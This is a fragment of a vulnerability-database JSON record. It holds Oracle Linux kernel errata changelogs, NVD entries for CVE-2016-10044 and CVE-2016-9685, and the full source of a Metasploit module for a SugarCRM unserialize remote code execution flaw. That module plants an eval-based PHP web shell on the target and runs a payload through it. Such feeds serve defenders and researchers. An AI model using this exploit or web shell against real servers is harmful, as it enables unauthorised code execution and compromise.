[backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads 
(Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}", "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3637", "href": "http://linux.oracle.com/errata/ELSA-2017-3637.html", "title": "Unbreakable Enterprise kernel security update", "type": 
"oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.19.12]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n[3.8.13-118.19.11]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}", "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3636", "href": "http://linux.oracle.com/errata/ELSA-2017-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:15:32", "bulletinFamily": "NVD", "description": "The aio_mount function in fs/aio.c in the Linux kernel before 4.7.7 does not properly restrict execute access, which makes it easier for local users to bypass intended SELinux W^X policy restrictions, and consequently gain privileges, via an io_setup system call.", "modified": "2017-07-25T01:29:00", "id": "CVE-2016-10044", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10044", "published": "2017-02-07T07:59:00", "title": "CVE-2016-10044", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "Multiple memory leaks in error paths in 
fs/xfs/xfs_attr_list.c in the Linux kernel before 4.5.1 allow local users to cause a denial of service (memory consumption) via crafted XFS filesystem operations.", "modified": "2018-01-05T02:31:00", "id": "CVE-2016-9685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9685", "published": "2016-12-28T07:59:00", "title": "CVE-2016-9685", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2019-12-13T03:58:47", "bulletinFamily": "exploit", "description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23 which could be abused to allow unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. The dangerous unserialize() call exists in the '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct() method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-06T23:58:41", "id": "MSF:EXPLOIT/UNIX/WEBAPP/SUGARCRM_REST_UNSERIALIZE_EXEC", "href": "", "type": "metasploit", "title": "SugarCRM REST Unserialize PHP Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SugarCRM REST Unserialize PHP Code Execution',\n 'Description' => %q{\n This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n the permissions of the webserver. The dangerous unserialize() call exists in the\n '/service/core/REST/SugarRestSerialize.php' script. 
The exploit abuses the __destruct()\n method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.\n },\n 'Author' => 'EgiX',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://karmainsecurity.com/KIS-2016-07'],\n ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],\n ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],\n ['URL', 'https://bugs.php.net/bug.php?id=72663']\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 23 2016'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/sugarcrm/\"])\n ])\n end\n\n def exploit\n upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'\n\n payload_serialized = \"O:+14:\\\"SugarCacheFile\\\":23:{S:17:\\\"\\\\00*\\\\00_cacheFileName\\\";\"\n payload_serialized << \"s:#{upload_php.length+2}:\\\"..#{upload_php}\\\";S:16:\\\"\\\\00*\\\\00\"\n payload_serialized << \"_cacheChanged\\\";b:1;S:14:\\\"\\\\00*\\\\00_localStore\\\";a:1:{i:0;s:55\"\n payload_serialized << \":\\\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\\\";}}\"\n\n print_status(\"#{peer} - Exploiting the unserialize() to upload PHP code\")\n\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),\n 'method' => 'POST',\n 'vars_post' => {\n 'method' => 'login',\n 'input_type' => 'Serialize',\n 'rest_data' => payload_serialized\n }\n })\n\n unless res\n print_error('Connection timed out while sending a request to rest.php')\n return\n end\n\n if res && res.code != 200\n print_error(\"#{peer} - Exploit failed: #{res.code}\")\n return\n end\n\n register_files_for_cleanup(File.basename(upload_php))\n\n print_status(\"#{peer} - Executing the payload #{upload_php}\")\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 
upload_php),\n 'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }\n })\n\n if res && res.code != 200\n print_error(\"#{peer} - Payload execution failed: #{res.code}\")\n return\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb"}]}